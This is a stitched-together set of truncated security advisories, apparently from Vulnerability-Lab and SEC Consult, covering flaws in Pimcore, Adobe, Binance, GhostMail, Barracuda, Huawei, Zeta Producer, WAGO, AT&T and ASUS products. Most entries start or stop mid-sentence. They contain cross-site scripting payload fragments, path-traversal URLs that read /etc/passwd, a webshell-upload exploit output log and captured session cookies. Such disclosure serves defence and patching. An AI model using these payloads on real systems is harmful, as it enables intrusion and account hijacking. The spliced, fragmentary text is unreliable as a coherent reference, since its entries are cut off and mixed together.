The existing anti-CSRF token in the HTTP request header named "X-pimcore-csrf-token" was found to be validated only in the "Settings > Users / Roles" function. Therefore, an attacker could perform a cross-site request forgery attack against virtually all other functions in order to at least add, update and delete data without having to submit the anti-CSRF token. A non-exhaustive list of affected requests:
POST /admin/asset/add-asset
POST /admin/asset/add-asset-compatibility
GET /admin/asset/delete
GET /admin/asset/import-server
GET /admin
Adobe Systems - Arbitrary Code Injection Vulnerability

Connection[keep-alive]

Response Header:
Server[Omniture DC/2.0.0]
Access-Control-Allow-Origin[*]
X-C[ms-5.6.0]
ETag["5A895DF8-68DE-70672227"]
Vary[*]
P3P[CP="This is not a P3P policy"]
xserver[www28]
Content-Length[6393]
Keep-Alive[timeout=15]
Connection[Keep-Alive]
Content-Type[application/x-javascript]

Vulnerable Source: Service Email #1 (Test)
STAND OUT WITH GREAT EXPERIENCES.
Dear Mr "<[PAYLOAD EXECUTION POINT FIRSTNAME & LASTNAME])" <, the experience is currently growing into the most important factor in customer loyalty. Experiences that are personal, exciting and consistent on every channel and device: that is now your biggest competitive advantage. Visit our Adobe Summit EMEA 2018. Experience with us what it really takes to create exceptional digital experiences. Learn from companies such as Sky, DHL and Raiffeisen how they have realised these novel experience offerings that already set their business models apart from the competition today.

Vulnerable Source: Service Email #2 (Test)
http://t.info.adobesystems.com//r/?id=h545ac15,8dd8df42,8dd8df46p1=7011O02bSn9QAEp2=003142mfNt5AAE; target="_blank" style="color:#0099ff;">https://www.adobe.com/content/dam/acom/fr/solutions/digital-marketing/events/images/other/49460e.de.because-we-keep-innovating-we-keep-leading.640x597.jpg; style="vertical-align:top; overflow:hidden;display:none;visibility:hidden;width:0;max-height:0;" width="320" vspace="0" hspace="0" height="340" border="0">
Dear Mr "%20"[PAYLOAD EXECUTION POINT FIRSTNAME & LASTNAME], Forrester rates Adobe as a Leader in web analytics. Read in The Forrester Wave™: Web Analytics, Q4 2017 why we continue to set the tone, with meaningful and actionable insights for every employee in the company.

Reference(s):
https://www.adobe.com
http://t.info.adobesystems.com
http://m.info.adobesystems.com
https://offers.adobe.com
https://sstats.adobe.com
https://apps.enterprise.adobe.com
http://landing.adobe.com
http://t-info.mail.adobe.com
https://offflivestream.creativecloud.adobeevents.com
https://summit-emea.adobe.com

Solution - Fix & Patch:
===
1. Restrict and filter the input fields and disallow the usage of script code tags in inputs.
2. Encode the context of the input fields during the POST request submit to prevent malformed injects.
3. Parse the firstname, lastname and company values in outgoing emails of all Adobe service templates.
4. Implement a filter mechanism with exception handling to parse contents delivered from an external service to the sub-service and then to the main lead database.
5. Raise awareness among employees by explaining the specific impact of the attack points, to prevent manual delivery of the payloads.
6. Develop a process to remove compromised information from the main database and from backups.
7. Ensure that a web application firewall captures such incidents and alerts or reacts, so that an attacker is not able to move through the separate database segments.

The reported URLs have already been reported to and disarmed by the Adobe Systems PSIRT and developer team. The issue has been patched in multiple functions. The forms are already restricted, and the case scenario was delivered with full transparency to ensure the problem becomes visible to Adobe.
(Example: http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D)

Security Risk:
==
The security risk of the arbitrary code injection vulnerability in the Adobe web services is estimated as high.

Credits & Authors:
==
Benjamin K.M. (Vulnerability Laboratory Core Research Team) [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the
Binance v1.5.0 - Insecure File Permission Vulnerability

Document Title:
===
Binance v1.5.0 - Insecure File Permission Vulnerability

References (Source):
https://www.vulnerability-lab.com/get_content.php?id=2135

Release Date:
=
2018-07-17

Vulnerability Laboratory ID (VL-ID): 2135

Common Vulnerability Scoring System: 2.5

Vulnerability Class: Access Permission Weakness

Current Estimated Price: 500€ - 1.000€

Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered an insecure file permission vulnerability in the Binance v1.5.0 software.

Vulnerability Disclosure Timeline:
==
2018-07-15: Researcher Notification & Coordination (Security Researcher)
2018-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=
Published

Affected Product(s):
Binance
Product: Binance 1.5.0

Exploitation Technique:
===
Local

Severity Level:
===
Low

Authentication Type:
Full authentication (admin) - full privileges

User Interaction:
=
Medium User Interaction

Disclosure Type:
Independent Security Research

Technical Details & Description:
An insecure file permissions vulnerability has been discovered in the official Binance v1.5.0 software. The vulnerability allows local attackers to abuse the insecure permission setup of the software's executables by manipulating them. The vulnerability exists due to insecure default permissions set on the Binance.exe, start.exe and unins000.exe files. There are no integrity checks or validation to ensure that the executable files are not modified during or after runtime. A local attacker could exploit the vulnerability by replacing `Binance.exe`, `start.exe` or `unins000.exe` with a malicious executable file. The malicious file could then execute, or modify data, with LocalSystem permissions, completing the exploitation.

Proof of Concept (PoC):
===
Binance for Windows contains a vulnerability that could allow a local attacker to gain elevated privileges. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.

-- PoC Session Logs (Permissions) --

C:\Binance>icacls binance.exe
Binance.exe BUILTIN\Administrateurs:(I)(F)                  <--- Full Access
            AUTORITE NT\Système:(I)(F)
            BUILTIN\Utilisateurs:(I)(RX)
            AUTORITE NT\Utilisateurs authentifiés:(I)(M)    <--- Modify
Information: 1 files correctly processed; 0 files failed to process

C:\Binance>icacls start.exe
start.exe BUILTIN\Administrateurs:(I)(F)                    <--- Full Access
          AUTORITE NT\Système:(I)(F)
          BUILTIN\Utilisateurs:(I)(RX)
          AUTORITE NT\Utilisateurs authentifiés:(I)(M)      <--- Modify
Information: 1 files correctly processed; 0 files failed to process

C:\Binance>icacls unins000.exe
unins000.exe BUILTIN\Administrateurs:(I)(F)                 <--- Full Access
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)
             AUTORITE NT\Utilisateurs authentifiés:(I)(M)   <--- Modify
Information: 1 files correctly processed; 0 files failed to process

Solution - Fix & Patch:
===
Include multiple integrity checks for the software files on startup and during runtime. Change the access permissions of all three executable files (binance.exe, start.exe & unins000.exe).

Security Risk:
==
The security risk of the insecure file permissions vulnerability and the missing integrity check in the software core is estimated as low.

Credits & Authors:
==
ZwX [Vulnerability Laboratory - Security Manager] - https://www.vulnerability-lab.com/show.php?user=ZwX
GhostMail - (filename to link) POST Inject Web Vulnerability
chars. Escape the web context to prevent an application-side script code execution vulnerability.

The vulnerability was reported on 2016-10-01. The issue was resolved during 2017 Q2 - Q4 by the GhostMail developer team.

Security Risk:
==
The security risk of the application-side input validation web vulnerability in the GhostMail mail module is estimated as medium (CVSS 4.2).

Credits & Authors:
======
Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Barracuda Cloud Control v3.020 - CS Cross Site Vulnerability
agement_type=Local=13633=de_DE& secondary_tab=edit_user_submitted=550a4ef30b4d0aa5d5435c2f09b3c09c_only=1_user= 1337benny%40barracuda.com">http://www.vulnerability-lab.com onload=alert("VulnerabilityLab") < _name=devices_filter=bccadmin=benny%40barracuda.com=1_name= user_management_width=800_height=500>

PoC: INDEX.CGI - Mail Listing (Output)
(Edit user > User-specific Bayesian data)

[target_user]
Benutzerspezifische Bayessche Daten: 1337be...@barracuda.com"><[EXECUTION OF CLIENT SIDE SCRIPT CODE!])' <<="" td="">

Reference(s):
https://bcc.127.0.0.1:1336/
https://bcc.127.0.0.1:1336/cgi-mod/
https://bcc.127.0.0.1:1336/cgi-mod/index.cgi

Solution - Fix & Patch:
===
The vulnerability can be patched by securely parsing and encoding the vulnerable values in the index.cgi file. Restrict the input of the marked vulnerable values and disallow the usage of special chars. Use entities and filter all inputs with exception handling to prevent client-side exploitation.

Note: The issue was reported in 2016 Q4 to the Barracuda Networks developer team. The issue was finally resolved in 2017 Q3 - Q4. The disclosure process took about 8 months to complete, following the vendor's patch cycle.

Security Risk:
==
The security risk of the non-persistent cross site scripting vulnerability in the target_user value parameter is estimated as medium.

Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
GhostMail - (Status Message) Persistent Web Vulnerability
Document Title:
===
GhostMail - (Status Message) Persistent Web Vulnerability

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1470

Release Date:
=
2018-06-27

Vulnerability Laboratory ID (VL-ID): 1470

Common Vulnerability Scoring System: 4

Vulnerability Class: Script Code Injection

Current Estimated Price: 1.000€ - 2.000€

Product & Service Introduction:
===
Sign up to military grade encrypted GhostMail and enjoy instant free and secure email & chat. No download or installs needed. GhostMail is your new secure email & chat platform, with great features like self destruction, two factor login and much more... Join free today and start enforcing your privacy and online rights.
(Copy of the Vendor Homepage: https://www.ghostmail.com/ )

Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered an application-side vulnerability in the official GhostMail chat online service web-application.

Vulnerability Disclosure Timeline:
==
2018-06-27: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=
Published

Affected Product(s):
GhostCom Ltd.
Product: GhostMail (Chat) - Web Application (Online Service) 2015 Q2

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
Restricted authentication (user/moderator) - User privileges

User Interaction:
=
Low User Interaction

Disclosure Type:
Bug Bounty Program

Technical Details & Description:
An application-side HTML injection web vulnerability has been discovered in the official GhostMail chat web-application. The vulnerability allows an attacker to inject unauthorized malicious script code on the application side of the affected module. The issue exists in the chat status of the application and is remotely exploitable against other GhostMail user accounts. The request method used to inject is POST and the attack vector is located on the application side of the affected online service web-application.

The encoding of the status message in the chat client is broken. Local and remote attackers can use the lack of validation to perform HTML injection attacks and compromise user/moderator/admin session data. The security risk of the HTML injection web vulnerability is estimated as medium with a CVSS count of 4.0. Exploitation of the issue requires a low privileged web-application user account and no direct user interaction. Successful exploitation of the application-side vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of the affected or connected module context.

Vulnerable Domain(s):
[+] Ghostmail.com

Vulnerable Module(s):
[+] Status Message

Vulnerable Parameter(s):
[+] Status message body context

Proof of Concept (PoC):
===
The HTML injection web vulnerability can be exploited by local and remote attackers with low user interaction and a low privileged application user account. For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.

Manual Steps to reproduce the vulnerability ...
1. Register an account and log in to the GhostMail application
2. Move to the chat status contents
3. Close the title tag with a double quote "
4. Now add new malicious content as payload in the status title for the chat
5. Start to chat; at the same moment the script code executes on both sides of the client
6. Successful reproduction of the vulnerability!

Note: There is no filter validation or mechanism in place to prevent an execution within the GhostMail web-application.

Reference(s):
https://www.ghostmail.com/

Solution - Fix & Patch:
===
The vulnerability can be patched by parsing and encoding the vulnerable status message in the GhostMail chat client. The issue was reported in 2016 Q4 (2016-10-01) and was finally resolved in 2017 Q3 - Q4 by the GhostMail developer team.

Security Risk:
==
The security risk of the application-side input validation web vulnerability in the chat module is estimated as medium (CVSS 4.0).

Credits & Authors:
==========
Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Huawei eNSP v1 - Buffer Overflow (DoS) Vulnerability
Document Title:
===
Huawei eNSP v1 - Buffer Overflow (DoS) Vulnerability

References (Source):
https://www.vulnerability-lab.com/get_content.php?id=2132

Security ID: huawei-sa-20180309-01-ensp
https://nvd.nist.gov/vuln/detail/CVE-2017-17321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17321

Acknowledgements:
https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20180309-01-ensp-en
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-17321

CVE-ID:
===
CVE-2017-17321

Release Date:
=
2018-07-13

Vulnerability Laboratory ID (VL-ID): 2132

Common Vulnerability Scoring System: 3.3

Vulnerability Class: Buffer Overflow

Current Estimated Price: 500€ - 1.000€

Product & Service Introduction:
===
Enterprise Network Simulation Platform (eNSP) is a free, scalable, and graphic network simulation platform developed by Huawei. Huawei eNSP is management and support software offered as a service.
(Copy of the Homepage: https://support.huawei.com/enterprise/en/network-management/ensp-pid-9017384 )

Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a buffer overflow causing a denial of service in the official Huawei eNSP v1.

Vulnerability Disclosure Timeline:
==
2018-07-13: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=
Published

Affected Product(s):
Huawei
Product: eNSP v100R002C00B510 v100R002C00B500
Huawei
Product: eNSP V100R002C00B390 V100R002C00B380 V100R002C00B370 V100R002C00B
Huawei
Product: eNSP V100R002C00B210 V100R002C00B200
Huawei
Product: eNSP V100R002C00B120 V100R002C00B110 V100R002C00B100

Exploitation Technique:
===
Local

Severity Level:
===
Medium

Authentication Type:
Restricted authentication (user/moderator) - User privileges

User Interaction:
=
No User Interaction

Disclosure Type:
Responsible Disclosure Program

Technical Details & Description:
A buffer overflow causing a denial of service vulnerability has been discovered in the official Huawei eNSP v1. The vulnerability allows an attacker to crash or shut down the software process through unexpected behavior. Huawei eNSP is vulnerable to a buffer overflow resulting in a denial of service, caused by improper validation of a specific command line parameter. A local authenticated attacker could exploit the vulnerability to make the software process behave abnormally, with unexpected behavior and unhandled errors, by sending specially crafted packet requests.

Solution - Fix & Patch:
===
Huawei has released software updates to fix this security vulnerability. Customers of the product should contact Huawei TAC (Huawei Technical Assistance Center) to request the upgrade contents. This advisory is available at the following link:
http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20180309-01-ensp-en

Security Risk:
==
The security risk of the buffer overflow causing a denial of service and unhandled unexpected errors in Huawei eNSP v1 is estimated as medium.

Credits & Authors:
==
S.AbenMassaoud [Vulnerability Laboratory Core Research Team] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php v
SEC Consult SA-20180712-0 :: Remote Code Execution & Local File Disclosure in Zeta Producer Desktop CMS
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
===
title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
vulnerable version: <=14.2.0
fixed version: >=14.2.1
CVE number: CVE-2018-13981, CVE-2018-13980
impact: critical
homepage: https://www.zeta-producer.com
found: 2017-11-25
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"With Zeta Producer, the website builder and online shop system for Windows, you can create and manage your website locally, on your computer. Get without expertise in 3 steps to your own homepage: select design, paste content, publish website. Finished."

Source: https://www.zeta-producer.com/de/index.html

Business recommendation:
The vendor provides a patched version which should be installed immediately. Users of the product also need to verify that the affected widgets are updated in the corresponding website project! It could be necessary to rebuild the whole project or copy the new widgets to the website projects. For further information consult the vendor.

Furthermore, an in-depth security analysis is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
---
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files to the server, but if the user uploads a PHP script with a .php extension the server renames it to .phps to prevent PHP code execution. However, the attacker can upload .php5 or .phtml files to the server without any restriction, and these alternative file extensions are executed as PHP code.

Furthermore, the server creates a folder to store the files, with a random name generated by PHP's "uniqid" function. Unfortunately, if the server permits directory listing, the attacker can easily browse to the uploaded PHP script. If directory listing is disabled, the attacker can still brute force the random name to gain remote code execution via the PHP script. Testing on a local server, it took about 20 seconds to brute force the random name. This attack will be slower over the Internet, but it is still feasible.

Also, if the user runs the Zeta Producer Desktop CMS GUI client locally, they are also vulnerable because the web server will be running on TCP port 9153.

The root cause is in the widget "formmailer", which is enabled by default. The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php

2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS, an unauthenticated attacker can read local files by exploiting path traversal issues. The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php

Proof of concept:
-
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.

[.. code has been removed to prevent misuses ..]

When the script is executed, a PHP script (shell) will be uploaded automatically.

# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to read arbitrary files from the OS with the privileges of the web server user. Any unauthenticated user can exploit this issue!

http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc=list

Vulnerable / tested versions:
-
The following versions have been tested, which were the latest versions available at the time of the test:
Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0

Source:
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/

Vendor contact timeline:
2017-11-29: Contacting vendor through i...@zeta-producer.com and various other email addresses from the website. No reply.
2017-12-13:
Barracuda ADC v5.x - Multiple Persistent Vulnerabilities
le last hour, last day and last week input field values. Restrict the input and disallow special chars. Filter the context of the values to prevent an execution of script code and implement a secure validation mechanism for the broken output in the dashboard service.

Note: The issue was reported in 2016 to the Barracuda Networks developer team. The issue was finally resolved in 2017 Q1 - Q4. The disclosure process took about 1 year to complete, taking the patch cycle into account.

Security Risk:
==
The security risk of the persistent input validation web vulnerability in the Barracuda Networks ADC appliance web-application is estimated as medium.

Credits & Authors:
==
Benjamin K.M. (Vulnerability Laboratory Core Research Team) - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Lenovo SU v5.07 - Buffer Overflow & Arbitrary Code Execution Vulnerability
ile flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: .
Translations: 0409.04b0
ProductName: Map Network Drive
InternalName: mapdrv
OriginalFilename: mapdrv.exe
ProductVersion: 1, 0, 0, 1
FileVersion: 1, 0, 0, 1
FileDescription: Map Network Drive Application
LegalCopyright: Copyright Lenovo 2005, 2006, all rights reserved. Copyright IBM Corporation 1996-2005, all rights reserved.

Solution - Fix & Patch:
===
Update Lenovo System Update to version 5.07.0072 or later. You can determine the currently installed version by opening Lenovo System Update, clicking on the green question mark in the top right corner and then selecting "About."

Lenovo System Update can be updated by choosing either of the following methods:
- Lenovo System Update automatically checks for a later version whenever the application is run. Click OK when prompted that a new version is available.
- To manually update, download the latest version from the following URL: https://support.lenovo.com/en/documents/ht080136

Security Risk:
==
The security risk of the buffer overflow and arbitrary code execution vulnerability is estimated as high.

Credits & Authors:
==
S.AbenMassaoud - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
SEC Consult SA-20180711-0 :: Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
===
title: Remote code execution via multiple attack vectors
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
vulnerable version: FW 01 - 01.01.10(01)
fixed version: FW 02
CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
impact: High
homepage: https://www.wago.com/
found: 2018-04-25
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60 years, WAGO has developed and produced innovative products for packaging, transportation, process, industrial and building automation markets amongst others. Aside from its innovations in spring pressure connection technology, WAGO has introduced numerous innovations that have revolutionized industry. Further ground-breaking inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."

Source: http://www.wago.us/wago/

"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY 7300T Web Panels help you reinforce the quality of your machinery and equipment with a refined design and industry-leading software. Learn more about how the right Web Panels make a difference. HMI components are the finishing touch for machines or systems and they have an overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing HMIs that leave a lasting impression and significantly increase both the value and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."

Source: http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp

Business recommendation:
HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users who access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code in order to break the security of this link by exploiting minimal user interaction.

As a consequence, a computer which is used for HMI administration should not provide any possibility to get compromised via malicious script code. One possible solution may be e.g.:
* Don't allow email clients
* Don't provide Internet access at all on the HMI stations

SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues.

Vulnerability overview/description:
---
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
Reflected cross-site scripting vulnerabilities were identified within multiple PHP scripts in the admin interface. The JSON parameter input which is sent to the device is not sanitized sufficiently. An attacker can exploit this vulnerability to execute arbitrary scripts in the context of the attacked user and gain control over the active session.

This vulnerability is present for authenticated and unauthenticated users!

2) Stored Cross-Site Scripting (CVE-2018-12981)
A stored cross-site scripting vulnerability was identified within the "PLC List" which can be configured in the web interface of the e!Display. By storing a payload there, an administrative or guest user can be attacked without tricking them into visiting a malicious web site or clicking on a malicious link.

This vulnerability is only present for authenticated users!

3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
Arbitrary files can be uploaded to the system without any check. It is even possible to change the location of the uploaded file on the system. As the web service does not run as a privileged user, it is not possible to upload a file directly to the web root, but it is possible to upload to many other locations on the file system. The normal user 'user' and the administrative user 'admin' can both upload files to the system.

4) Incorrect Default Permissions (CVE-2018-12979)
Due to incorrect default permissions, a file in the web root can be overwritten by the unprivileged 'www' user. This is the same user which is used in the context of the web server.

5) Remote code execution via
AT&T Bizcircle - Persistent Profile Cross Site Scripting Vulnerabilities
circle.att.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/]
Cookie[PHPSESSID=l18mlg2dueco0q3h6kb131eub7; AMCV_55633F7A534535110A490D44%40AdobeOrg=2096510701%7CM CIDTS%7C17396%7CMCMID%7C26100431646396483062447545331633367848%7CMCAAMLH-1503573649%7C6%7CMCAAMB-1503573649 %7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1502976049s%7CNONE%7CMCAID%7CNONE%7CMCSYNCSOP%7C411-17403%7CvVersion%7C2.0.0; mbox=session#1502968849133-685067#1502970967|PC#1502968849133-685067.26_19#1504178707; AMCVS_55633F7A534535110 A490D44%40AdobeOrg=1; _ga=GA1.2.774089946.1502968850; _gid=GA1.2.1647846308.1502968850; s_cc=true; bp-activity-oldestpage=1; aam_uuid=26195646366965627042419912699465776394; Successful Registration=true; TLTSID=DFFB796CF9727EB3DAD892F1CE4732DB; fsr.s={"v2":1,"v1":1,"rid":"d036702-53861434-b5e4-2910-b41f2", "cp":{"ufix":"no","ug":"n","platform":"mSite","WLS_TSR":"no"},"to":4.5,"pv":6,"f":1502969105924}; wordpress_logged_in_cae26c4a20b3aee9c355ac89848c9a6c=att1759500603%7C1503141687%7C5r0gGlSD0k4TLZ8DdczeF GgpYJrrbeqwy9p8pvslaMr%7Cab6915c095b9e9a27373469d6f4cae49510879dab933281d16868d1cf4bd524a; _gat=1]
Connection[keep-alive]
Response Header:
Server[Apache]
X-Frame-Options[SAMEORIGIN]
Cache-Control[no-cache, must-revalidate, max-age=0]
X-UA-Compatible[IE=edge]
Content-Type[text/html; charset=UTF-8]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[19404]
Connection[keep-alive]

Reference(s):
https://bizcircle.att.com/
https://bizcircle.att.com/members/
https://bizcircle.att.com/members/att1759500603/
https://bizcircle.att.com/members/att1759500603/profile/
https://bizcircle.att.com/members/att1759500603/profile/edit/
https://bizcircle.att.com/members/att1759500603/profile/edit/group/
https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/

Solution - Fix & Patch:
===
The vulnerability has been patched by the AT&T Bizcircle developer team. The issue was part of the official bug bounty program.

Security Risk:
==
The security risk of the persistent cross site scripting vulnerabilities in the web-application is estimated as medium (CVSS 4.6).

Credits & Authors:
==
Benjamin K.M. [Vulnerability Laboratory Core Research Team] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Barracuda ADC 5.x - Client Side Cross Site Scripting Vulnerability
ENT SIDE SCRIPT CODE EXECUTION!]
Mime Type[text/html]
Request Header:
Host[adc.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://adc.localhost:8080/cgi-mod/index.cgi?password=48c669c1112b5fd89648930d335f0d8b=141302_type=Local_only=1=evil.source[NON-PERSISTENT INJECTED SCRIPT CODE PAYLOAD!]%3Ecross-site-scripting=de_DE_secondary_tab=view_internal_patterns_tab=SECURITY=_tab=copy_internal_attack_patterns=guest=1_name=libraries496409_width=725_height=500]
Cookie[_ga=GA1.2.608616028.1422207688; _ga=GA1.2.608616028.1422207688; _gat=1]
Connection[keep-alive]
Response Header:
Server[BarracudaHTTP 4.0]
Content-Type[text/html]
Content-Length[1949]
Connection[close]

Reference(s):
http://adc.localhost:8080/
http://adc.localhost:8080/cgi-mod/
http://adc.localhost:8080/cgi-mod/index.cgi
http://adc.localhost:8080/cgi-mod/index.cgi?password=
http://adc.localhost:8080/cgi-mod/index.cgi?password=x=x
http://adc.localhost:8080/cgi-mod/index.cgi?password=x=x_type=Local
http://adc.localhost:8080/cgi-mod/index.cgi?password=x=x_type=Local_only=
http://adc.localhost:8080/cgi-mod/index.cgi?password=x=x_type=Local_only=1=

Solution - Fix & Patch:
===
The vulnerability can be patched by parsing and encoding the vulnerable group value in the copy|kopieren module GET method request. Restrict the input and disallow the usage of special chars to prevent client-side script code injection attacks. Implement secure exception handling to prevent client-side script code injection attacks.

Note: The issue has been reported in 2016 Q4 (2016-10-01) and was finally resolved in 2017 Q3 - Q4 by the Barracuda Networks developer team in all appliance series.

Security Risk:
==
The security risk of the non-persistent input validation web vulnerability in the Barracuda Networks ADC appliance web-application is estimated as medium (CVSS 3.6).

Credits & Authors:
==
Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Barracuda ADC 5.x - Filter Bypass & Persistent Validation Vulnerability
/virtual_services/Corp_Web/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/

Solution - Fix & Patch:
===
The vulnerability can be patched by parsing and encoding the vulnerable content rules input field values. Restrict the input and disallow special chars. Filter and parse the item listing in the configured server module to prevent an execution. Implement its own exception handling to prevent application-side script code execution.

Security Risk:
==
The security risk of the persistent input validation web vulnerability in the Barracuda Networks ADC appliance web-application is estimated as medium (CVSS 3.8).

Note: The issue was reported in 2016 to the Barracuda Networks developer team. The issue was finally resolved in 2017 Q1 - Q4. The disclosure process took about 1 year to complete, taking the patch cycle into account.

Credits & Authors:
==
Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability
ype[text/html] Request Header: Host[event.localhost] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html] Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0] Connection[keep-alive] Upgrade-Insecure-Requests[1] If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT] If-None-Match["31793159796dce1:0"] Cache-Control[max-age=0] Response Header: Content-Type[text/html] Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT] Etag["31793159796dce1:0"] Connection[keep-alive] - Status: 200[OK] GET http://event.localhost/nw/_ui/en/evil.source%3C/td Mime Type[text/html] Request Header: Host[event.localhost] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[http://event.localhost/nw/_ui/en/ParentalControl.html] Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Content-Type[text/html] 